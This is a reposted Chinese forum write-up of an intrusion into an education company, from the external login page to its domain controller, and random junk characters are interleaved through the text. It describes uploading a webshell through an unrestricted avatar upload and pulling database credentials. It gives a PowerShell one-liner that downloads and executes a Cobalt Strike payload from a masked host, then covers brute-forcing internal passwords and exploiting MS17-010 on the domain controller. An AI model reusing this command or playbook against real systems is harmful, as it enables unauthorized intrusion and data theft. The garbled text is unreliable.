这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
正文
! n+ e# I2 w6 }! Y! G) U% a6 x) q" K I+ d) m. @# K
9 r( q( d% q1 g* @
目标:www.xxxx.com(一家教育机构)
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能 p0 G6 p! ?$ W; U
8 G. U- t( s l7 t+ Y - }# S; B9 K7 f8 Z s1 ^! ]
进行了简单的信息搜集
( {2 o0 ~/ y/ o
子域名搜集2 U) }5 g! n+ k( g
& q) C# y, R- t+ Q# Z; n$ k1 c8 \
fofa找资产
$ a: q! \0 N/ h" p1 o) t c
& n/ `1 X% J2 o% I1 c
9 k/ J2 i8 |; ^$ b+ y
5 ~ G( }2 b2 Y6 T" H; E8 g% W5 y4 v
一共七个资产。去重之后只有两个。
6 z: c5 Q, {6 I4 W/ \
. d2 B6 h) d, P8 n5 b
. G1 x; a p3 g1 P% J+ e! y" q) m 目录探测% h+ N# G! y& @7 K3 {1 J2 K/ s! t# v/ ]
2 @+ ]8 X% R% ~1 h
* m0 W( B k' o }+ m$ O
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
+ I" O( n" E. \9 M% m0 I. S
; s _1 ?0 N& ^
: ]: X: ~9 b5 `5 j9 k/ { 我又尝试了通过修改返回包来绕过登录界面
& c# A8 Q, o" j2 P# P4 v% \, ^* _5 J' f X# w3 ^. `% Y* F& Z
还是不行,尝试注入无果, i* ]' |2 e1 c F7 t6 M4 S
6 G' c i& k ? & I' G- b2 U9 U$ y0 }3 k
不过我目录探测出了一处Spring信息泄露
( f I D3 m8 @2 D' D
+ g, B/ H# G( r1 i4 c( J. d V
$ O z" z$ [; u( I7 w $ p3 l& x* k- P- R; n4 z- l
5 [- z& {% Y9 t8 q- V \4 N) `) i尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
& L1 u2 x* _* H* T2 V" }6 b. k ! L! Y" |% z" N1 i* h9 L0 D8 v
* o7 Q# \8 P( m9 r* k& k7 ^. X ^' k 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。- y6 F; w2 M0 N( c
0 q+ z3 g1 c8 @; [: X& _$ U2 b1 P$ n' p z & q( W; w7 Z: G
获取有些师傅到这一步就手机抓包电脑测了。
; M7 u! B3 ^! ?$ H' x4 q4 a2 V Y Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
' k- i* Q+ O% l7 j其中在一个公众号发现了小程序,可以进行注册。) w5 c# o9 L; P8 ]) X4 k; q- V
看到了头像上传,尝试上传获取WebShell+ O; R+ X3 x7 ]) B6 `/ T; m
! p' u( L n, I# g
7 t9 X6 O$ N$ \9 F- [; i未做任何限制成功GetShell,上了冰蝎马,目录没权限访问# j6 k3 r7 A$ H4 |7 R x0 O
% o6 X: n r" ~4 R" ^, st* s" J5 F+ z" {! ~ 9 T' l5 t* A+ x' G
3 d" n$ l: [8 i# o& l: T4 K" | 然后上了大马. |* V' o6 m( t1 Y/ K$ m3 K
. N# e7 U' P5 w, O F. G: [% j3 F+ Z1 O; T1 }* }$ O
: Z z8 t+ S$ b
. @' y! m* t9 h! j% a 通过翻找文件发现数据库账号密码
* J. \; S/ f& A; x. u & ^) x) c. b# v6 R* D: _# R
--内网渗透9 |" T* P& ?! K! j* v
- _1 F) A# y. Z; Q3 ?8 w% I6 ~& T' u+ P" e; q5 Q' T1 a+ H 直接通过powershell执行 cs上线8 s7 Z8 k# t; X$ c7 i( d
! `# X, J( X6 F6 o. q; q7 k: r/ e1 b4 U( v7 u' H8 m @ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"6 I- ^. A+ B* T, z7 `& j; Z, t. i+ H
4 T; R Q/ ~0 T! @; W! I' t4 J! u7 _
6 d4 x' V; d' K0 o1 {" [9 X 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
3 n6 K9 m& p K) Y& [+ R
/ |; A; D, m2 v5 \' ]+ Q! A- P' `+ r- P' o, e% p/ }, p
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
6 n2 f1 I: {1 T) [# L6 @$ m# K
, D. V/ j# ?5 t7 o- `
; a( r* P3 `; [6 H1 [
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
7 `, z- \# B( I6 j& j
9 R: ~3 U* ?8 h
7 C) W$ a& T; |: w- G+ c
6 G0 o% |6 j5 S, `( k
% U8 P1 y- w0 X2 K0 S # \# }" l, Q5 d
小结
' j* u: Z7 ?* a% t
1 t6 |2 u' x" w+ @! h/ U. F 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!% C$ A/ O/ c4 W, v1 G
S% R% J: f& x, i8 `" s- F/ r+ w' I
/ Q6 \( T2 ?, _' ~5 G作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html; Q& }6 q6 A1 \) p% {& @0 z
1 y8 C- V9 Q4 A , O0 W! T- \9 L) ~: A
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |